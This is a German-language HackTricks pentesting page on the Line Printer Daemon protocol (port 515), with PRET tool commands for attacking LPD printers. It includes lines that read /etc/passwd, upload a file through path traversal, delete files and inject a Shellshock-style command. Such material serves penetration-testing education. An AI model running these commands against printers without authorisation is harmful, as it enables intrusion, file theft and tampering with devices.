hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
2024-02-10 15:36:32 +00:00

4.4 KiB

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Einführung in das LPD-Protokoll

In den 1980er Jahren wurde das Line Printer Daemon (LPD)-Protokoll in Berkeley Unix entwickelt, das später durch RFC1179 formalisiert wurde. Dieses Protokoll arbeitet über den Port 515/tcp und ermöglicht Interaktionen über den Befehl lpr. Das Wesentliche beim Drucken über LPD besteht darin, eine Kontrolldatei (um Jobdetails und Benutzer festzulegen) zusammen mit einer Datendatei (die die Druckinformationen enthält) zu senden. Während die Kontrolldatei die Auswahl verschiedener Dateiformate für die Datendatei ermöglicht, wird die Handhabung dieser Dateien durch die spezifische LPD-Implementierung bestimmt. Eine weit verbreitete Implementierung für Unix-ähnliche Systeme ist LPRng. Beachtenswert ist, dass das LPD-Protokoll ausgenutzt werden kann, um bösartige PostScript- oder PJL-Druckaufträge auszuführen.

Tools zur Interaktion mit LPD-Druckern

PRET stellt zwei wesentliche Tools vor, lpdprint und lpdtest, die eine einfache Methode zur Interaktion mit LPD-kompatiblen Druckern bieten. Mit diesen Tools können verschiedene Aktionen durchgeführt werden, vom Drucken von Daten bis zur Manipulation von Dateien auf dem Drucker, wie z.B. Herunterladen, Hochladen oder Löschen:

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Für Personen, die sich weiterhin für das Hacken von Druckern interessieren, finden Sie hier eine umfassende Ressource: Hacking Printers.

Shodan

  • Port 515
Lernen Sie das Hacken von AWS von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: